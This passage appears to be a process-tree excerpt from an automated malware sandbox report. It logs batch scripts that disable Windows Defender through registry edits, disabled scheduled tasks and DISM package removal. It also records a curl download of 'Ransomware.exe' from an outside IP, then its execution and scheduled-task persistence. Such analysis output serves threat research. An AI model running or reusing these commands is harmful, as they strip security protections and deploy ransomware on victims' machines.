        PID:4092
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:2716
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        
        PID:228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:1840
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:1044
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:4400
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        
        PID:3152
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:4680
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:4516
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:1468
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:4868
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:1440
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:3640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:1484
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:1836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2796
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:4384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:752
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:3060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:4688
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        Suspicious use of WriteProcessMemory
        
        PID:1800
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        
        PID:3796
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:4692
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:2512
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4560
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:2688
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3324
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1672
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3340
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4024
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:5112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3784
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1900
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4208
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4216
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4508
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:8
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4228
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\498AAE07-20B9-46A5-8154-830489F0E240\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\498AAE07-20B9-46A5-8154-830489F0E240\dismhost.exe {49BAC2F1-7B41-4B8D-8AB8-08EAED4D0B93}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1084
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\77252232-A9B0-4A42-A9D6-C9DC5E0334DF\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\77252232-A9B0-4A42-A9D6-C9DC5E0334DF\dismhost.exe {3841CDC7-9F53-4FF5-A439-30403FFFBF09}
        8⤵
        Executes dropped EXE
        
        PID:3608
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\DE92D5EB-F1B5-4283-AEFD-5CBF0A1835AC\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\DE92D5EB-F1B5-4283-AEFD-5CBF0A1835AC\dismhost.exe {ACE3B10D-3A1B-43FE-B3CE-8CB440B4676E}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3016
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\919BB016-BF03-4279-A047-D054F201D1C3\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\919BB016-BF03-4279-A047-D054F201D1C3\dismhost.exe {C3FDAFA9-3E1E-4FF7-9A79-140CAF1AA854}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4872
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\12E40641-A19C-4F39-B1C3-70063FCB4976\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\12E40641-A19C-4F39-B1C3-70063FCB4976\dismhost.exe {5ABCB5DF-0322-4B4D-9BFE-4E12B2F1B59A}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2552
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\090F5B73-B390-4843-BA51-FB9BEEF5DB43\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\090F5B73-B390-4843-BA51-FB9BEEF5DB43\dismhost.exe {4FFB3CE0-4D65-4487-8BE3-F2D27560FCC5}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4544
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\70FB3EA3-F1FE-4E2A-9BE5-CDDD77F438CF\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\70FB3EA3-F1FE-4E2A-9BE5-CDDD77F438CF\dismhost.exe {6F65DDA2-4F9F-4405-8E06-C0E6819DC864}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4984
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\E6C58DBD-AA01-45D7-BFE3-12F24F3E813B\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\E6C58DBD-AA01-45D7-BFE3-12F24F3E813B\dismhost.exe {ADBF95D6-92AA-4939-A536-FF7CEF3754F5}
        8⤵
        Executes dropped EXE
        
        PID:3976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:3784
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:3564
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:2296
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:4400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:4616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4332
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3604
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:2072
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:1868
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4296
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:5072
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:4028
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:1476
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        
        PID:1684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3740
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3280
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:2156
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:2552
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        
        PID:3096
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:2640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:3340
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:2812
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:3032
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:2256
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:1516
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:4220
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4640
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:4880
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:1276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:3116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:4236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:3032
        
        C:\configuration\Ransomware.exe
        
        Ransomware.exe
        7⤵
        Executes dropped EXE
        
        PID:3144
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Ransomware" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\configuration\Ransomware.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe"
        8⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        9⤵
        Runs ping.exe
        
        PID:3856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "Ransomware" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe" /rl HIGHEST /f
        9⤵
        Creates scheduled task(s)
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe
        
        "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe"
        9⤵
        Executes dropped EXE
        
        PID:3684
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2664
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        
        PID:1796
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:2364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        
        PID:4144
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:2348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:4208
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4508
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:1324
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:3604
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4912
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2644
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2552
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
